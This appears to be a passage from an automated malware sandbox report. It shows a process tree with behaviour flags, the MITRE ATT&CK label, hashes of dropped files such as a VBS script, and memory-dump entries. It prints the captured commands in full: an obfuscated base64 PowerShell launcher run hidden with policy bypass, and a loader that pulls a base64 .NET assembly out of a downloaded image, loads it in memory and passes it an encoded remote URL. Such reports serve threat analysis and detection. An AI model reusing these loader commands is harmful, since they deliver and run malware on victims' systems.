fCmÇjyDDgrJWgRidYoNfCmÇjyDerJWgRidYoNfCmÇjyDBOrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDNrJWgRidYoNfCmÇjyDB6rJWgRidYoNfCmÇjyDE0rJWgRidYoNfCmÇjyDeQrJWgRidYoNfCmÇjyD0rJWgRidYoNfCmÇjyDHkrJWgRidYoNfCmÇjyDTgBDrJWgRidYoNfCmÇjyDDQrJWgRidYoNfCmÇjyDegBPrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDRQB2rJWgRidYoNfCmÇjyDEwrJWgRidYoNfCmÇjyDegBwrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBIrJWgRidYoNfCmÇjyDFIrJWgRidYoNfCmÇjyDbwrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDLrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBmrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZgBkrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDGYrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBmrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDGYrJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBmrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDsrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBkrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBzrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCwrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDGQrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDnrJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDLrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDYwB1rJWgRidYoNfCmÇjyDCcrJWgRidYoNfCmÇjyDKQrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('rJWgRidYoNfCmÇjyD','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnliYS8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2056

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C4NFM511JFTZ6Q00PNPC.temp

    Filesize

    7KB

    MD5

    73a160647932d8e9196ae805eb65f335

    SHA1

    4947da7e5f0fdba23a884312be9e72e54966b760

    SHA256

    860cd25acdeff4eed12a8c257c9959d403131566f5c72ebcd3d748d2d5963669

    SHA512

    bfeefe848e84d1905b70b4d60d88c64bb40d181548b92783a2f4dce43f639a84b7ca8f1afd14097148ac0b8f739cd58e0b984327fa21e860940ef04c5f7424b1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    73a160647932d8e9196ae805eb65f335

    SHA1

    4947da7e5f0fdba23a884312be9e72e54966b760

    SHA256

    860cd25acdeff4eed12a8c257c9959d403131566f5c72ebcd3d748d2d5963669

    SHA512

    bfeefe848e84d1905b70b4d60d88c64bb40d181548b92783a2f4dce43f639a84b7ca8f1afd14097148ac0b8f739cd58e0b984327fa21e860940ef04c5f7424b1

  • C:\Users\Admin\AppData\Roaming\wvsdfgjs.vbs

    Filesize

    257KB

    MD5

    a4b27b7143e37f8c1c3d038e22fab7e5

    SHA1

    0cd0ee78e4ca6594ed69b387962f5872a1125ed3

    SHA256

    f2d370a98975e818ac6e0e52db36aaa0a29b2ac04eedc5c8b917d2ee62bc5571

    SHA512

    ddadde2e895121fe2e3393468358bd92e1fac0fec25b980386de28357b067fb8cbe913bf2e622dcbf82120b18af7b44e4fce8bf9393b294adda5bf85c277f7d5

  • C:\Users\Admin\AppData\Roaming\wvsdfgjs.vbs

    Filesize

    257KB

    MD5

    a4b27b7143e37f8c1c3d038e22fab7e5

    SHA1

    0cd0ee78e4ca6594ed69b387962f5872a1125ed3

    SHA256

    f2d370a98975e818ac6e0e52db36aaa0a29b2ac04eedc5c8b917d2ee62bc5571

    SHA512

    ddadde2e895121fe2e3393468358bd92e1fac0fec25b980386de28357b067fb8cbe913bf2e622dcbf82120b18af7b44e4fce8bf9393b294adda5bf85c277f7d5

  • memory/2056-41-0x00000000027E0000-0x0000000002820000-memory.dmp

    Filesize

    256KB

  • memory/2056-40-0x000000006C510000-0x000000006CABB000-memory.dmp

    Filesize

    5.7MB

  • memory/2056-42-0x000000006C510000-0x000000006CABB000-memory.dmp

    Filesize

    5.7MB

  • memory/2056-38-0x000000006C510000-0x000000006CABB000-memory.dmp

    Filesize

    5.7MB

  • memory/2056-39-0x00000000027E0000-0x0000000002820000-memory.dmp

    Filesize

    256KB

  • memory/2064-46-0x000000007299D000-0x00000000729A8000-memory.dmp

    Filesize

    44KB

  • memory/2064-30-0x000000007299D000-0x00000000729A8000-memory.dmp

    Filesize

    44KB

  • memory/2064-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2064-1-0x000000007299D000-0x00000000729A8000-memory.dmp

    Filesize

    44KB

  • memory/2064-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2168-31-0x0000000002320000-0x0000000002360000-memory.dmp

    Filesize

    256KB

  • memory/2168-37-0x000000006C510000-0x000000006CABB000-memory.dmp

    Filesize

    5.7MB

  • memory/2168-27-0x000000006C510000-0x000000006CABB000-memory.dmp

    Filesize

    5.7MB

  • memory/2168-43-0x000000006C510000-0x000000006CABB000-memory.dmp

    Filesize

    5.7MB

  • memory/2168-28-0x000000006C510000-0x000000006CABB000-memory.dmp

    Filesize

    5.7MB

  • memory/2168-29-0x0000000002320000-0x0000000002360000-memory.dmp

    Filesize

    256KB